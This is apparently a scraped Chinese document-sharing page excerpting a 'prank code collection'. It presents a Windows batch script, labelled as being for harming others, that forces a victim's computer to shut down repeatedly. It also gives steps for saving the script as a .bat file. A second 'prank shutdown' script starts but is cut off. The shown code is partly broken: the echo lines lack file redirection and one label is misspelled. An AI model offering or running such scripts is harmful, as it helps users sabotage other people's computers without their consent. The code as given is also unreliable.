- 2487
- 0
- 约3.44千字
- 约 9页
- 2018-09-30 发布于天津
- 举报
整人代码大全.doc
整人代码大全
让对方重启指定次数(害人专用)
@echo off
if not exist c:1.txt echo. c:1.txt goto err1
if not exist c:2.txt echo. c:2.txt goto err1
if not exist c:3.txt echo. c:3.txt goto err1s
if not exist c:4.txt echo. c:4.txt goto err1
if not exist c:5.txt echo. c:5.txt goto err1
goto err2
:err1
shutdown -s -t 0
:err2
上面可以让对方电脑重启5次后不在重启,当然如果你修改一下加个if not exist c:6.txt echo. c:6.txt goto err1那
就是重启6次
改成7就是7次...
打开“开始→程序→附件→记事本”,把代码部分复制进去,点“另存为”,路径选“你想要放的地方”,
保存类型为“所有文件”,文件名为“你想要的名字.bat”,你的批量处理器就完成了。
善意恶搞关机
首先呢,我们在桌面创建个新文件夹然后打开,在上面找到-工具T-文件夹选项O-查看
把隐藏已知文件类型的扩展名前面的勾去掉.
然后我们开始制作.在桌面建立个记事本,然后把下面代码复制进去
on error res
原创力文档

文档评论(0)